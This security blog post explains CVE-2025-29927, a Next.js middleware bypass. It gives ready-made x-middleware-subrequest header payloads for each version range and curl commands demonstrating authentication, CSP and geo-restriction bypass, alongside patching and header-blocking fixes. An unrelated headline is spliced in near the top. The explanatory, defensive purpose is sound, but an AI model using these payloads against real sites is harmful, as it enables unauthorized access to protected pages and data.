Best of 2025: CVE-2025-29927 – Understanding the Next.js Middleware Vulnerability
When security vulnerabilities appear in popular frameworks, they can affect thousands of websites overnight. That’s exactly what’s happening with a newly discovered vulnerability in Next.js – one of the most widely used React frameworks today.
Best of 2025: Google Gemini AI Flaw Could Lead to Gmail Compromise, Phishing
When security vulnerabilities appear in popular frameworks, they can affect thousands of websites overnight. That’s exactly what’s happening with a newly discovered vulnerability in Next.js – one of the most widely used React frameworks today.Let’s break down this surprisingly simple but dangerous security flaw.What Makes This Vulnerability So Dangerous?Imagine building a house with a sophisticated security system, but accidentally installing a secret button that disables all the alarms at once. That’s essentially what happened with Next.js.The vulnerability (officially called CVE-2025-29927) affects Next.js versions 11.1.4 through 15.2.2 – which means years worth of websites are potentially vulnerable.Here’s the shocking part: all it takes to bypass security is adding a single HTTP header to your request:x-middleware-subrequest: middleware:middleware:middleware:middleware:middlewareAdd this to any request, and suddenly all of Next.js’s security checks disappear. No login needed. No security barriers. Nothing.Understanding Next.js MiddlewareTo understand why this works, we need to know a bit about middleware.Next.js middleware acts like a security guard that checks visitors before they reach your actual website content. It runs before any page loads and can:Check if users are logged inBlock visitors from certain countriesAdd security headers to prevent attacksRedirect users to different pagesAbout 15% of React applications use Next.js, and many rely on middleware for their core security.How The Bug Actually WorksThe problem stems from a mechanism designed to prevent infinite loops. Next.js needed a way to stop middleware from calling itself endlessly, so developers added a counter.Here’s what happens:Every time middleware runs, Next.js checks a special header calledx-middleware-subrequestThis header contains a count of how many times middleware has runIf it has run too many times (5 by default), Next.js skips the middleware entirelyThe critical flaw: anyone can set this header themselvesLooking at the actual code makes it clearer:// From Next.js’s source code (simplified)
const subrequests = request.headers.get(‘x-middleware-subrequest’)?.split(‘:’) || [];
const depth = subrequests.filter(s => s === middlewareName).length;
if (depth >= MAX_RECURSION_DEPTH) {
return NextResponse.next(); // Skip all middleware!
}ThemiddlewareNameis usually something likemiddlewareorsrc/middlewaredepending on your project setup. By repeating this name in the header several times, an attacker tricks Next.js into thinking middleware has already run too many times.Testing For This VulnerabilityAnyone can verify if their Next.js application is vulnerable using a special test application created for this purpose: https://github.com/strobes-security/nextjs-vulnerable-appThe testing process works like this:Clone the repository:git clone https://github.com/strobes-security/nextjs-vulnerable-appInstall dependencies and start the app:npm install && npm run devTry accessing the/dashboardpage – you’ll be redirected to loginNow try with the special header:curl -v -H “x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware”
http://localhost:3000/dashboardSuddenly, the dashboard appears without any login. The security is completely bypassed.Different Project Structures Need Different ExploitsThe exact header value changes depending on how your Next.js project is set up:Pages Router (versions 11.1.4-12.1.x):x-middleware-subrequest: pages/_middlewareApp Router (versions 12.2.x-13.x):x-middleware-subrequest: middleware:middleware:middleware:middleware:middlewareApp Router with /src folder (versions 14.x-15.2.2):x-middleware-subrequest: src/middleware:src/middleware:src/middleware:src/middleware:src/middlewareReal-World Security ImpactsThis vulnerability opens several serious attack paths:Complete Authentication Bypass Attackers can access admin panels, private dashboards, or user data without logging in.Content Security Policy Bypass Middleware often sets CSP headers that prevent cross-site scripting. With this bypass, those protections vanish: bashCopycurl -H “x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware” -H “Content-Type: text/html” –data “<script>alert(‘hacked’)</script>” http://example-site.comGeographic Restrictions Bypass Many sites use middleware to restrict content by location. This header bypasses those checks: bashCopycurl -H “x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware” -H “CF-IPCountry: RU” http://example-site.com/eu-only-contentProtecting Your Next.js ApplicationsThere are three main ways to fix this vulnerability:Update Next.js ImmediatelyUpgrade to version 15.2.3+ or 14.2.25+These versions have patched the security holeBlock The Dangerous Header If updating isn’t possible right away, block the header at the web server level: For NGINX: nginxCopylocation / { proxy_set_header x-middleware-subrequest “”; }For Apache: apacheCopyRequestHeader unset x-middleware-subrequestImplement Defense-in-DepthDon’t rely solely on middleware for securityAdd server-side authentication checks (like with NextAuth.js)For critical paths, add redundant security layersKey Security Lessons From This VulnerabilityThis bug teaches three fundamental security principles:Security Needs Multiple Layers Like an onion or a castle with multiple walls, security should have fallback layers. If middleware fails, other security checks should still protect your application.Never Trust User-Controlled Input Any data from users – including HTTP headers – can be manipulated. Always validate or sanitize input.Simple Bugs Can Cause Major Problems This vulnerability wasn’t complex. It was a simple oversight in how a counter worked. Yet it compromised thousands of applications.Checking Your Own ApplicationsIf you run Next.js applications, take these steps immediately:Test your applications with the exploit payloads listed aboveReview all middleware configurations for security dependenciesUpdate to the latest version as soon as possibleFor more technical details, refer to:Why Web Security Is Always EvolvingThis vulnerability reminds us that security is never “done.” It’s an ongoing process. Even popular, well-maintained frameworks can have critical flaws discovered years after release.The good news? The Next.js team responded quickly with patches. But this incident serves as a powerful reminder that we need to stay vigilant, keep our dependencies updated, and always implement multiple layers of security.Have you checked your Next.js applications yet? The fix is simple, but only if you apply it.The post CVE-2025-29927 – Understanding the Next.js Middleware Vulnerability appeared first on Strobes Security.
About Author
